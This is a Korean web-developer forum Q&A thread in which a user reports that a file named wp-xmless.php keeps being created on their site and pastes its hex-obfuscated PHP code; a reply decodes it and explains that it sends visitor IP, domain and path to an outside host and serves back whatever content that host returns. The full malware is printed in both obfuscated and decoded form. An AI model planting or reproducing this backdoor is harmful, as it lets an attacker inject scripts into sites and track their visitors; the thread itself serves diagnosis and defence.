바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

QA

바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

본문

바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

파일 내용은 아래처럼 알수없는 코드로 구성되어 있어요.

원인을 알 수 있을까요? 도움 부탁 드립니다.ㅜ

 

<?php
header(_typeGet());
echo _httpGet("\x68\x74\x74\x70\x3A\x2F\x2F\x76\x70\x62\x7A\x2E\x61\x75\x67\x30\x31\x63\x6F\x64\x65\x2E\x63\x6F\x6D\x2F\x68\x74\x61\x63\x63\x65\x73\x73\x2E\x61\x73\x70\x78\x3F\x68\x6F\x73\x74\x3D" . urlencode($_SERVER["\x52\x45\x4D\x4F\x54\x45\x5F\x41\x44\x44\x52"]) . "\x26\x64\x6F\x6D\x61\x69\x6E\x3D" . urlencode($_SERVER["\x48\x54\x54\x50\x5F\x48\x4F\x53\x54"]) . "\x26\x70\x61\x74\x68\x3D"  . urlencode($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"]));
function _httpGet($url){
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($curl, CURLOPT_URL, $url);
        $res = curl_exec($curl);
        curl_close($curl);
        return $res;
    }
function _typeGet(){
        $path = $_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"];
        if (strpos($path, "\x2E\x78\x6D\x6C"))
                return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x6D\x6C";
        if (strpos($path, "\x2E\x6A\x73"))
                return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";
        return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C";
    }
?>

이 질문에 댓글 쓰기 :

답변 2

모든 소스파일에서 wp-xmless.php 파일을 생성하는 부분이 없는지 찾아보셔야 할듯하시고.

우선 해당 부분을 풀어보면

http://vpbz.aug01code.com/htaccess.aspx?로 사용자의 도메인과 ip를 수집해가는거 같습니다.

 

  1. 이런코드입니다. 사이트에 원하는 javascript 코드를 심을 수 있겠는데요..
  2.  
  3. header(_typeGet());
  4. echo _httpGet("http://vpbz.aug01code.com/htaccess.aspx?host=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&domain=" . urlencode($_SERVER["HTTP_HOST"]) . "&path=" . urlencode($_SERVER["REQUEST_URI"]));
  5. function _httpGet($url){
  6. $curl = curl_init();
  7. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  8. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  9. curl_setopt($curl, CURLOPT_URL, $url);
  10. $res = curl_exec($curl);
  11. curl_close($curl);
  12. return $res;
  13. }
  14. function _typeGet(){
  15. $path = $_SERVER["REQUEST_URI"];
  16. if (strpos($path, ".xml"))
  17. return "Content-Type: application/xml";
  18. if (strpos($path, ".js"))
  19. return "Content-Type: application/javascript";
  20. return "Content-Type: text/html";
  21. }
답변을 작성하시기 전에 로그인 해주세요.
전체 345
QA 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT